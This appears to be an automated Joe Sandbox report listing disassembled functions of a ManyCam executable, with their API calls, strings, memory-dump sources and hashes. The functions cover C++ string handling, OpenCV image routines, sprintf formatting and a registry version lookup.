Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 6ffb65bce278b8fe47ce7c833305a1f3afc7f0cb37ed8eddf46bce9baa873d41
Instruction ID: 50f8718e498666fa4da98437a76d4638b1e2a723603710fac9882f3192207998
Opcode Fuzzy Hash: 6ffb65bce278b8fe47ce7c833305a1f3afc7f0cb37ed8eddf46bce9baa873d41
Instruction Fuzzy Hash: 1BD1AA70A002459FCB04FFA5D8D1EAF77B6BF89304B10495EF511AB396CA39A901CBE5

Function 00411300 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,00000000,00528E39,000000FF,?,004112C4,?,00000001,00000000,0040F3C5,00000001,00000000,00000000), ref: 00411344
std::bad_exception::bad_exception.LIBCMTD ref: 00411358
_CxxThrowException.MSVCR80(004112C4,0057CBF8), ref: 00411366
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(004112C4,0057CBF8,?,?,?,00000000,00528E39,000000FF,?,004112C4,?,00000001,00000000,0040F3C5,00000001,00000000), ref: 00411375

Strings

map/set<T> too long, xrefs: 0041133C

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 42cbf8a29792d702c98aabde1d8b08b81332d8e2c8f3267b75d2f7efa1133912
Instruction ID: fc6447a121a983bb72d300740fc035bcb7914751d3a952c33331dda71f3fca67
Opcode Fuzzy Hash: 42cbf8a29792d702c98aabde1d8b08b81332d8e2c8f3267b75d2f7efa1133912
Instruction Fuzzy Hash: 4DD12D70A002099FCB04EFE5C991EEFB775AF89304B10455EF512AB365CA7CAD51CBA8

Function 004C14E0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,00000000,005340C9,000000FF,?,004C1384,?,00000001,00000000,004BAFA3,00000001,00000000,00000000), ref: 004C1524
std::bad_exception::bad_exception.LIBCMTD ref: 004C1538
_CxxThrowException.MSVCR80(004C1384,0057CBF8), ref: 004C1546
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(004C1384,0057CBF8,?,?,?,00000000,005340C9,000000FF,?,004C1384,?,00000001,00000000,004BAFA3,00000001,00000000), ref: 004C1555

Strings

map/set<T> too long, xrefs: 004C151C

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 373c4984a0380365a134575c025ccd3d03ef30724ed9c15aa6ec8d22811ce55d
Instruction ID: 5f54f1dc26024d97c3e5589f28a2b26444c27508ce2d65950266073b7809569a
Opcode Fuzzy Hash: 373c4984a0380365a134575c025ccd3d03ef30724ed9c15aa6ec8d22811ce55d
Instruction Fuzzy Hash: D1D10F75E042459FCB04EFA5C891EAF7775AF8A304F1045AEF502AB355DA38AD01CBB8

Function 0048D7D0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,?,00530F79,000000FF,?,0048AEF4,?,00000001,?,?,00000001,00000000,00000000), ref: 0048D814
std::bad_exception::bad_exception.LIBCMTD ref: 0048D828
_CxxThrowException.MSVCR80(0048AEF4,0057CBF8), ref: 0048D836
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(0048AEF4,0057CBF8,?,?,?,00530F79,000000FF,?,0048AEF4,?,00000001,?,?,00000001,00000000,00000000), ref: 0048D845

Strings

map/set<T> too long, xrefs: 0048D80C

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 30f3dba2d2509044dd435c0e4a58e2e90cb7d7e200ab4d5d41f53f078059e0ff
Instruction ID: f924f05d9c195ac9d2efefafaa7b998481315dfbc5b04f0f3db32ea2b030e7a3
Opcode Fuzzy Hash: 30f3dba2d2509044dd435c0e4a58e2e90cb7d7e200ab4d5d41f53f078059e0ff
Instruction Fuzzy Hash: 1ED1DB74E102459FCB04FFA5C891E6F7B75AF89304F10896EF4159B295CA38AD01CFA8

Function 004C7A20 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Part of subcall function 00407140: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00000000,00000000,80000002,SOFTWARE\ManyCam), ref: 00407162

memset.MSVCR80 ref: 004C7ABE

Part of subcall function 00407190: RegQueryValueExW.ADVAPI32(00000040,?,00000000,00000040,?,?,004C7AEB,AppVersion,?,00000040,80000002,SOFTWARE\ManyCam,00020019), ref: 004071CC

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

CManyCamModel::GetManyCamVersion, xrefs: 004C7A5B
SOFTWARE\ManyCam, xrefs: 004C7A86
@, xrefs: 004C7AC6
ob@, xrefs: 004C7A62, 004C7B52, 004C7B19, 004C7A65
AppVersion, xrefs: 004C7ADE

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapclock$OpenQueryValuememset
String ID: @$AppVersion$CManyCamModel::GetManyCamVersion$SOFTWARE\ManyCam$ob@
API String ID: 1430646295-175800182
Opcode ID: 99caf996730d2821cc7d9e1b6342d5801e04e7129e3737ca7ce9bef82be1f397
Instruction ID: 07a999de59d8292b32f2331ae8109d5d18864066084ba78fe0f4ff90b5b286a5
Opcode Fuzzy Hash: 99caf996730d2821cc7d9e1b6342d5801e04e7129e3737ca7ce9bef82be1f397
Instruction Fuzzy Hash: 31315B70A04218DEDB10DB54D952BEEBBB4AB05304F0041AEE5457B2C1DBB86E48CBA6

Function 004C1CC0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,00000000,005340F9,000000FF,?,004C1B64,?,00000001,00000000,004BB8D3,00000001,00000000,00000000), ref: 004C1D04
std::bad_exception::bad_exception.LIBCMTD ref: 004C1D18
_CxxThrowException.MSVCR80(004C1B64,0057CBF8), ref: 004C1D26
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(004C1B64,0057CBF8,?,?,?,00000000,005340F9,000000FF,?,004C1B64,?,00000001,00000000,004BB8D3,00000001,00000000), ref: 004C1D35

Strings

map/set<T> too long, xrefs: 004C1CFC

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 244b48426afd2b3cb84e5586bde9a12e9605ad4a338fae707614c6ae995eb5f3
Instruction ID: 76fe67f2c80d83fee2b03a8fd12379f2c1e3e221b52a71524e2575de1d4bc0e2
Opcode Fuzzy Hash: 244b48426afd2b3cb84e5586bde9a12e9605ad4a338fae707614c6ae995eb5f3
Instruction Fuzzy Hash: 1DD1E974A00205AFCB14EFE6C891EEF7775AFC9308B104D5EF4129B256DA39A801CBB5

Function 004059C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

cvCreateMat.CXCORE099(00000004,00000001,00000005,?,?,004015E6,?), ref: 004059C9
cvCreateMat.CXCORE099(00000004,00000001,00000005,?,?,?,?,?,004015E6,?), ref: 00405A0C
cvCreateMat.CXCORE099(00000004,00000001,00000005,?,?,?,?,?,?,?,?,004015E6,?), ref: 00405A4F

Part of subcall function 004057D0: cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,00000000), ref: 004057DA
Part of subcall function 004057D0: cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,00000000), ref: 004057EC
Part of subcall function 004057D0: cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,00000000), ref: 004057FE
Part of subcall function 004057D0: cvCreateMat.CXCORE099(00000004,00000004,00000005,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405810
Part of subcall function 004057D0: cvGEMM.CXCORE099(?,?), ref: 0040586A
Part of subcall function 004057D0: cvGEMM.CXCORE099(?,?), ref: 00405895
Part of subcall function 004057D0: cvReleaseMat.CXCORE099(?), ref: 004058A2
Part of subcall function 004057D0: cvReleaseMat.CXCORE099(?), ref: 004058AF
Part of subcall function 004057D0: cvReleaseMat.CXCORE099(?), ref: 004058BC
Part of subcall function 004057D0: cvReleaseMat.CXCORE099(?), ref: 004058C9

cvReleaseMat.CXCORE099(?,?,?,?,00000000), ref: 00405A9A
cvReleaseMat.CXCORE099(?), ref: 00405AA7
cvReleaseMat.CXCORE099(?), ref: 00405AB4

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: CreateRelease
String ID:
API String ID: 557197377-0
Opcode ID: ba2c734ec160b10dc2be184458e091322f75ff8d3104fcbc22788eb87a98d7e3
Instruction ID: 043076e51676209564484e982c9936a884ec24064fff71ead1165430e30ebd4e
Opcode Fuzzy Hash: ba2c734ec160b10dc2be184458e091322f75ff8d3104fcbc22788eb87a98d7e3
Instruction Fuzzy Hash: C6311574605201DFD304DF10D499E26BBA1BFC8704F5289CCE2941B2E6DB71D936CB82

Function 00C280A0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 81COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00C280E3
sprintf.MSVCR80 ref: 00C2812A

Strings

%d., xrefs: 00C280DD
.Nan, xrefs: 00C28153
-.Inf, xrefs: 00C2816B
.Inf, xrefs: 00C28172

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: %d.$-.Inf$.Inf$.Nan
API String ID: 590974362-1425397501
Opcode ID: 40361806f29b1bc347a7f5272add679d5accb330560361798d724e0be52a0edd
Instruction ID: 9ee0e98ce96bfead0d7d836d1afec122fd1821d8867c7feb1cded739c580f197
Opcode Fuzzy Hash: 40361806f29b1bc347a7f5272add679d5accb330560361798d724e0be52a0edd
Instruction Fuzzy Hash: FA210A74609310CBCB156B28FD5536E77A0BF85702F548558E8D6827D4EA318CAD878A

Function 00C281A0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 80COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00C281EC
sprintf.MSVCR80 ref: 00C28233

Strings

%d., xrefs: 00C281E6
.Nan, xrefs: 00C28254
-.Inf, xrefs: 00C2826C
.Inf, xrefs: 00C28273

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: %d.$-.Inf$.Inf$.Nan
API String ID: 590974362-1425397501
Opcode ID: 85b27dcff25f6a59fc42107d2f7622195ddd9493565b196be72885778ffa40f5
Instruction ID: 00bd6e4910da0bc72efa922615e11a8c1c6eb8943aa0ce57e0f49924ec45618a
Opcode Fuzzy Hash: 85b27dcff25f6a59fc42107d2f7622195ddd9493565b196be72885778ffa40f5
Instruction Fuzzy Hash: 47212C74605700CBCB15AB18FD5536D7BA0FF81700F644558E8D682794EA3189ADCB87

Function 00402BB0 Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

cvCreateImage.CXCORE099(?,?,00000008,00000001,?,?,00403181,?,?), ref: 00402BC0
cvCreateImage.CXCORE099(?,?,00000008,00000001,?,00000000,?,00000000,?,0040120F), ref: 00402BD4
cvCreateImage.CXCORE099(?,?,00000020,00000003,?,?,?,?,?,00000000,?,00000000,?,0040120F), ref: 00402BE9
cvReleaseImage.CXCORE099(?,?,?,?,?,?,00000000,?,00000000,?,0040120F), ref: 00402BFE
cvReleaseImage.CXCORE099(?,?,00000000,?,00000000,?,0040120F), ref: 00402C10
cvReleaseImage.CXCORE099(?,?,00000000,?,00000000,?,0040120F), ref: 00402C22

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Image$CreateRelease
String ID:
API String ID: 3874174198-0
Opcode ID: 90bf2cca833fb2c28ec0a48af1516d2f96f179e9554cc466a05b48644bb4997a
Instruction ID: 6a9ac0958563a1589a8d938dd82cbe29a94ad790e47f913414e9d99cb75ce162
Opcode Fuzzy Hash: 90bf2cca833fb2c28ec0a48af1516d2f96f179e9554cc466a05b48644bb4997a
Instruction Fuzzy Hash: F901F9F590130176F630AB259D4EF4B76DCFF91701F04483AF55AA12C1F6B4E184C221

Function 004032A0 Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

cvReleaseImage.CXCORE099(004012A4,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032CA
cvReleaseImage.CXCORE099(004012A8,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032DC
cvReleaseImage.CXCORE099(004012AC,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032EA
cvReleaseImage.CXCORE099(004012C0,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403302
cvReleaseImage.CXCORE099(004012C4,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403314
cvReleaseImage.CXCORE099(004012C8,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403326

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: ImageRelease
String ID:
API String ID: 535124018-0
Opcode ID: d5d590391344c0c731e22e2c0c0412fa703b525e44fcf2c6df5cf6810ee77da8
Instruction ID: f6f80441a689a6daaa6ac2ab205e4bd6027bf7437223482053866a57996ed6f5
Opcode Fuzzy Hash: d5d590391344c0c731e22e2c0c0412fa703b525e44fcf2c6df5cf6810ee77da8
Instruction Fuzzy Hash: A91198F6801201E7EB309E11D889B4BBBACBF50302F44443AD84552285E778B78DCAAB

Function 00434B70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 00447FF0: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00448006

Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00434C17

Part of subcall function 004DB530: _DebugHeapAllocator.LIBCPMTD ref: 004DB54A

memset.MSVCR80 ref: 00434C2B

Part of subcall function 00447E60: SendMessageW.USER32(?,00001132,00000000,yLC), ref: 00447E78

Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00434CEC

Part of subcall function 004DAF40: _DebugHeapAllocator.LIBCPMTD ref: 004DAF57

memset.MSVCR80 ref: 00434D1D

Strings

pzC, xrefs: 00434BF8

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapMessageSendmemset$Base::Concurrency::details::Concurrency::task_options::get_schedulerPolicyScheduler
String ID: pzC
API String ID: 1527497025-2444570644
Opcode ID: e3d9d7585f77d899c6d2de3521e35a6c3d02375cb3cf3d8ffcf042e74bc981e3
Instruction ID: ed1ee3073941a6660e753338659c4a22794240fa1e9d27d03445b3c6d8f704d4
Opcode Fuzzy Hash: e3d9d7585f77d899c6d2de3521e35a6c3d02375cb3cf3d8ffcf042e74bc981e3
Instruction Fuzzy Hash: 9C610CB1D01118DBDB14DFA5D891BEEBBB5FF48304F2041AEE10A67281DB386A45CF99

Function 00408360 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004083C6
CompareStringW.KERNEL32(00000400,00000001,?,00000003,<A>,00000003), ref: 00408424
CompareStringW.KERNEL32(00000400,00000001,?,00000004,</A>,00000004), ref: 00408474

Strings

<A>, xrefs: 0040840C
</A>, xrefs: 0040845C

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: CompareString$lstrlen
String ID: </A>$<A>
API String ID: 1657112622-2122467442
Opcode ID: 71153d6a453ea1603edaace69c389d9b4173073ffd4576bfc9ed4d047b5a66fa
Instruction ID: 8d4014fe370238e856f28d0c67f96b0aed6e5c53389ece421d0f182d8b12796b
Opcode Fuzzy Hash: 71153d6a453ea1603edaace69c389d9b4173073ffd4576bfc9ed4d047b5a66fa
Instruction Fuzzy Hash: CB5121B4A0421ADFDB04CF88C990BAEB7B2FF84304F108159E915AB3D0DB75A946CF95

Function 004098C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB787

_DebugHeapAllocator.LIBCPMTD ref: 00409943

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

_DebugHeapAllocator.LIBCPMTD ref: 00409981
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,.png,?,?,0053CC2C,data\images\addEffectDlg\,?,?,?,744843B1), ref: 004099A1

Strings

data\images\addEffectDlg\, xrefs: 0040993B
.png, xrefs: 00409979

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$Image@@Load@
String ID: .png$data\images\addEffectDlg\
API String ID: 1315443971-2820274302
Opcode ID: b1f5f912a3a6442a3cc382653bc540b1293c177797d8700b4929a6cfcbca8e46
Instruction ID: 99387fa8a9a4026cbf0ab0abdc8698a1dc38235ed2b893dafecf0ce6710d2d8a
